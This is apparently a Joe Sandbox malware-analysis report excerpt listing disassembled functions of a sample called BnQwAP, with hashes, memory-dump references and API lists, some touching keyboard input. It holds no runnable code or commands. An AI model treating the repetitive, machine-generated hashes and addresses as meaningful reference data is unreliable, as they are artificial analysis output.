                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                    • API String ID: 1993697042-4164748364
                                                                                                                    • Opcode ID: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                                                                    • Instruction ID: 119416cabf14809e3ef33f04967f0254fe99d7f862a5e56f46a3cb5d08c420b3
                                                                                                                    • Opcode Fuzzy Hash: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                                                                    • Instruction Fuzzy Hash: EC52A832B18A4681EB648F25D5546BD3762FF85B88F584136DB0E93BA4CF3EE458C740
                                                                                                                    Function 00007FF65608BA0C Relevance: 54.8, APIs: 30, Strings: 1, Instructions: 500windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                    • API String ID: 1218376639-328681919
                                                                                                                    • Opcode ID: 8c1f687f88e9da4140e4452ba941a0bd8309265392956f150e7897e172de2189
                                                                                                                    • Instruction ID: d8a527d0af9bce63440751f7329a03f76cf371346867543aa4478fb7dced9c47
                                                                                                                    • Opcode Fuzzy Hash: 8c1f687f88e9da4140e4452ba941a0bd8309265392956f150e7897e172de2189
                                                                                                                    • Instruction Fuzzy Hash: ED121632A0965286FB60DF25D6946BD23A1EF85BA4F484131DE1DA7BE5CF3ED40AC700
                                                                                                                    Function 00007FF65608DB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 1208186926-3110715001
                                                                                                                    • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                                    • Instruction ID: 02a690fd674f2f18476703e6abe7571dff4b24b451a50f711b3c87109fe14300
                                                                                                                    • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                                    • Instruction Fuzzy Hash: C5123872A0864286E724CB25D6547BD37A1FB85798F080635DE4DA7BE0CF3EE849DB00
                                                                                                                    Function 00007FF6560732AC Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 327windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-2439800395
                                                                                                                    • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                                    • Instruction ID: 2ab769012b3e809691cf4373e236ff64a3e1200883bfe59b61f82156c463be3a
                                                                                                                    • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                                    • Instruction Fuzzy Hash: 7BE1B27660878287E754CF26E94466A77A1FB88B88F540135DF4EA3B64CF7DE449CB00
                                                                                                                    Function 00007FF656004514 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 3778422247-2988720461
                                                                                                                    • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                                    • Instruction ID: 4c6478c6a4eeb675d6dd9dd68c1028fa2e45eb206765ab9a9dff2038d9205db3
                                                                                                                    • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                                    • Instruction Fuzzy Hash: A7416621F0851287F7255B27EA1463A23A2BF88B99F594035CD0AE7B54DE7F984EC740
                                                                                                                    Function 00007FF655FE183C Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3372153169-0
                                                                                                                    • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                                    • Instruction ID: f22a70ee08dc9b1fa261d6f669bf66fceeafb70be35dd3388b5077cda45d7b0a
                                                                                                                    • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                                    • Instruction Fuzzy Hash: 6922B335A0964385EBA48F26D9546BE3361FF44F98F9C4132CA5EA7694DF3EE848C700
                                                                                                                    Function 00007FF65600F8D0 Relevance: 31.9, APIs: 20, Instructions: 1857COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2880407647-0
                                                                                                                    • Opcode ID: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                                                                    • Instruction ID: 0b2b9f972f81a66fb3469bba52443c187d1adc60702ffefda6940b5f5183645d
                                                                                                                    • Opcode Fuzzy Hash: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                                                                    • Instruction Fuzzy Hash: F803C872A081C28BD7758E15DA40BF937A5FB9478CF480135DB4AB7B58DF39AA48CB40
                                                                                                                    Function 00007FF65608C6D4 Relevance: 28.9, APIs: 19, Instructions: 396windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1015379403-0
                                                                                                                    • Opcode ID: c223660f41613faab48e644fda56d4534d60a7471830602c41769a8e954ea874
                                                                                                                    • Instruction ID: ef2401bb67939c6f15317984189c45a6597e46f4db9e94520baaa8a3ce61296b
                                                                                                                    • Opcode Fuzzy Hash: c223660f41613faab48e644fda56d4534d60a7471830602c41769a8e954ea874
                                                                                                                    • Instruction Fuzzy Hash: 5802E631A0868285EB60DF21D6442BD2771FF847A8F484632DA5EA7BE5DF3EE549C700
                                                                                                                    Function 00007FF65607206C Relevance: 27.1, APIs: 18, Instructions: 125COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215588206-0
                                                                                                                    • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                                    • Instruction ID: d9afe48b14e7166bb31880dab2ace07f4e456bcf41c0f3dccdc0fd65e88fcae9
                                                                                                                    • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                                    • Instruction Fuzzy Hash: C5512232F0CB028AEB589F65E55917D33A2EB49748F184439DA0ED3784EE7ED45AC344
                                                                                                                    Function 00007FF65602529C Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 281475176-2761157908
                                                                                                                    • Opcode ID: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                                                                    • Instruction ID: 00486992325e1bfc689c41dbcecae92fb58ae852b9ce6eeaee7abaa4d0eebc9a
                                                                                                                    • Opcode Fuzzy Hash: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                                                                    • Instruction Fuzzy Hash: 20B2F872A181828BE7658F65DA406FD37A2FF4438CF585135DA09B7B84DF3AE948CB04
                                                                                                                    Function 00007FF655FE5F3C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 0-3110715001
                                                                                                                    • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                                                    • Instruction ID: f29a033eb3fad0c7b485dd48b15b6acc2241a072fda4c572bbee8e842fa24352
                                                                                                                    • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                                                    • Instruction Fuzzy Hash: C3A1F932A0864286F764CF25D9142BE77A1FF84B98F588135DB4EA3A94CF7DE549CB00
                                                                                                                    Function 00007FF656022400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                    • String ID: -$:$:$?
                                                                                                                    • API String ID: 3440502458-92861585
                                                                                                                    • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                                                    • Instruction ID: 8fbce857a9efef7b2eb65463e3a49fccf766648619c65bdeee4f5b54e3eca09a
                                                                                                                    • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                                                    • Instruction Fuzzy Hash: 3FE1D332A0829286F7249F71DE506B96791FF84788F4C5135EA4EA2B99DF3ED449C700
                                                                                                                    Function 00007FF6560672A8 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 284timefileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                    • API String ID: 3232708057-3289030164
                                                                                                                    • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                                    • Instruction ID: 08f2760ef434810ea32de7f9490b4d0702f304d066ec4c134c716649239c013e
                                                                                                                    • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                                    • Instruction Fuzzy Hash: 3ED1E632B1865381EB50EF65E4550FE6721FB80B98F844132EE4DA7AA9DF7DD908CB00
                                                                                                                    Function 00007FF65606A350 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                    • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                                                    • Instruction ID: fa18cad2e878119e1d950d0cf4d21c4bc7234d57e03faceb550f901d1e5c863d
                                                                                                                    • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                                                    • Instruction Fuzzy Hash: 5D41E721A0865254EB40DB26EB442B96391FF84BA8F9C9131DD6DE36E4DF7ED44EC700
                                                                                                                    Function 00007FF65605D87C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString
                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                    • API String ID: 890592661-1007645807
                                                                                                                    • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                                    • Instruction ID: 7de6de790977cde68c26a4f2871a3dd4d17e4c123fe8fd60d8434837aa8f4487
                                                                                                                    • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                                    • Instruction Fuzzy Hash: A7216426B1859391E720DB25F9646AA6321FFE4B4CFC88031D64DA39A8DE3DD90EC744
                                                                                                                    Function 00007FF656057E64 Relevance: 18.2, APIs: 12, Instructions: 173keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                                    • Instruction ID: 2c1050ba873778d53cf4fd476e0de52fcec94f90f91f4ae566f750a79464a592
                                                                                                                    • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                                    • Instruction Fuzzy Hash: 6B71F662A0C3C285FB758B30D1402B92B61EB66B88F5C0039DA8DA3392CE5FD94DD711
                                                                                                                    Function 00007FF65606A4F8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
